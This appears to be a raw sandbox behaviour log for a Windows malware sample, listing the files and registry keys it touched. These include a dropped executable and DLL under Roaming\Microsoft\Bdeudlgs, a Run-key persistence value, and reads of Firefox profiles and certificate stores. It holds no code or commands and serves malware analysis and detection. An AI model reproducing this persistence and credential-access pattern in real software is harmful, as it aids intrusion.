C:\Users\user\AppData\Local\Temp\gfycfilt.dll
C:\Windows\System32\gfycfilt.dll
C:\Windows\system\gfycfilt.dll
C:\Windows\gfycfilt.dll
C:\Windows\System32\wbem\gfycfilt.dll
C:\Windows\System32\WindowsPowerShell\v1.0\gfycfilt.dll
C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Temp
C:\321.txt
C:\Windows\sysnative\C_1252.NLS
C:\Windows\sysnative\*.dll
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\DA24
C:\Users\user\AppData\Local\Temp\DA24\BF2.tmp
C:\Users\user\AppData\Local\Temp\DA24\BF2.bat
\??\MountPointManager
C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\DA24\BF2.bat"
C:\Users\user\AppData\Local\Temp\cmd.*
C:\Users\user\AppData\Local\Temp\cmd
C:\Windows\System32\cmd.*
C:\Windows\System32\cmd.COM
C:\Windows\System32\cmd.exe
C:\
C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe"
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\gfycfilt.dll
C:\Users\user\AppData\Roaming
C:\Windows\sysnative\p2pcollab.dll
C:\Windows\sysnative\QAGENTRT.DLL
C:\Windows\sysnative\dnsapi.dll
C:\Windows\sysnative\fveui.dll
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*
C:\Users\user\AppData\Local\Temp\Cab9694.tmp
C:\Users\user\AppData\Local\Temp\Tar96A5.tmp
C:\Users\user\AppData\Local\Temp\
C:\Windows\inf\
C:\Users\user\AppData\Local\Temp\Cab9713.tmp
C:\Users\user\AppData\Local\Temp\Tar9714.tmp
C:\Windows\sysnative\en-US\WINHTTP.dll.mui
C:\Users\user\AppData\LocalLow
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab9F5F.tmp
C:\Users\user\AppData\Local\Temp\Tar9F60.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\CabAD55.tmp
C:\Users\user\AppData\Local\Temp\TarAD56.tmp
C:\Users\user\AppData\Local\Temp\CabAF5A.tmp
C:\Users\user\AppData\Local\Temp\TarAF5B.tmp
C:\Windows\sysnative\ntdll.dll
C:\Users\user\AppData\Roaming\system64.dll
C:\Users\user\AppData\Local\Temp\CabC4E4.tmp
C:\Users\user\AppData\Local\Temp\TarC4E5.tmp
C:\Windows\sysnative\CabC4E4.tmp
C:\Users\user\AppData\Local\Temp\CabCAEF.tmp
C:\Users\user\AppData\Local\Temp\TarCAF0.tmp
C:\Windows\sysnative\CabCAEF.tmp
C:\Users\user\AppData\Local\Temp\CabCB3F.tmp
C:\Users\user\AppData\Local\Temp\TarCB40.tmp
C:\Windows\sysnative\CabCB3F.tmp
C:\Users\user\AppData\Local\Temp\CabCCA8.tmp
C:\Users\user\AppData\Local\Temp\TarCCA9.tmp
C:\Windows\sysnative\CabCCA8.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\prefs.js
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\*
C:\Windows\sysnative\shell32.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\321.txt
C:\Windows\sysnative\C_1252.NLS
C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\DA24\BF2.tmp
C:\Users\user\AppData\Local\Temp\DA24\BF2.bat
C:\Users\user\AppData\Local\Temp\Cab9694.tmp
C:\Users\user\AppData\Local\Temp\Tar96A5.tmp
C:\Users\user\AppData\Local\Temp\Cab9713.tmp
C:\Users\user\AppData\Local\Temp\Tar9714.tmp
C:\Windows\sysnative\en-US\WINHTTP.dll.mui
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab9F5F.tmp
C:\Users\user\AppData\Local\Temp\Tar9F60.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\CabAD55.tmp
C:\Users\user\AppData\Local\Temp\TarAD56.tmp
C:\Users\user\AppData\Local\Temp\CabAF5A.tmp
C:\Users\user\AppData\Local\Temp\TarAF5B.tmp
C:\Windows\sysnative\ntdll.dll
C:\Users\user\AppData\Roaming\system64.dll
C:\Users\user\AppData\Local\Temp\CabC4E4.tmp
C:\Users\user\AppData\Local\Temp\TarC4E5.tmp
C:\Users\user\AppData\Local\Temp\CabCAEF.tmp
C:\Users\user\AppData\Local\Temp\TarCAF0.tmp
C:\Users\user\AppData\Local\Temp\CabCB3F.tmp
C:\Users\user\AppData\Local\Temp\TarCB40.tmp
C:\Users\user\AppData\Local\Temp\CabCCA8.tmp
C:\Users\user\AppData\Local\Temp\TarCCA9.tmp
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\DA24\BF2.bat
C:\Users\user\AppData\Local\Temp\Cab9694.tmp
C:\Users\user\AppData\Local\Temp\Tar96A5.tmp
C:\Users\user\AppData\Local\Temp\Cab9713.tmp
C:\Users\user\AppData\Local\Temp\Tar9714.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab9F5F.tmp
C:\Users\user\AppData\Local\Temp\Tar9F60.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\CabAD55.tmp
C:\Users\user\AppData\Local\Temp\TarAD56.tmp
C:\Users\user\AppData\Local\Temp\CabAF5A.tmp
C:\Users\user\AppData\Local\Temp\TarAF5B.tmp
C:\Users\user\AppData\Local\Temp\CabC4E4.tmp
C:\Users\user\AppData\Local\Temp\TarC4E5.tmp
C:\Users\user\AppData\Local\Temp\CabCAEF.tmp
C:\Users\user\AppData\Local\Temp\TarCAF0.tmp
C:\Users\user\AppData\Local\Temp\CabCB3F.tmp
C:\Users\user\AppData\Local\Temp\TarCB40.tmp
C:\Users\user\AppData\Local\Temp\CabCCA8.tmp
C:\Users\user\AppData\Local\Temp\TarCCA9.tmp
C:\Users\user\AppData\Local\Temp\DA24\BF2.bat
C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe
C:\Users\user\AppData\Local\Temp\Cab9694.tmp
C:\Users\user\AppData\Local\Temp\Tar96A5.tmp
C:\Users\user\AppData\Local\Temp\Cab9713.tmp
C:\Users\user\AppData\Local\Temp\Tar9714.tmp
C:\Users\user\AppData\Local\Temp\Cab9F5F.tmp
C:\Users\user\AppData\Local\Temp\Tar9F60.tmp
C:\Users\user\AppData\Local\Temp\CabAD55.tmp
C:\Users\user\AppData\Local\Temp\TarAD56.tmp
C:\Users\user\AppData\Local\Temp\CabAF5A.tmp
C:\Users\user\AppData\Local\Temp\TarAF5B.tmp
C:\Users\user\AppData\Local\Temp\CabC4E4.tmp
C:\Users\user\AppData\Local\Temp\TarC4E5.tmp
C:\Users\user\AppData\Local\Temp\CabCAEF.tmp
C:\Users\user\AppData\Local\Temp\TarCAF0.tmp
C:\Users\user\AppData\Local\Temp\CabCB3F.tmp
C:\Users\user\AppData\Local\Temp\TarCB40.tmp
C:\Users\user\AppData\Local\Temp\CabCCA8.tmp
C:\Users\user\AppData\Local\Temp\TarCCA9.tmp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LDAP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_USERS\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\ErfkBwzLz2p.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Ini
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\ChainEngine\Config
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableMandatoryBasicConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableCANameConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableUnsupportedCriticalExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlCountInCert
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCountPerChain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCertCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\CryptnetPreFetchTriggerPeriodSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableWeakSignatureFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\ChainCacheResyncFiletime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\#16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\Ldap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllOpenStoreProv
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Keys
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\CTLs
HKEY_CURRENT_USER\
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\CA\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\CA\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Disallowed\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Disallowed\PhysicalStores
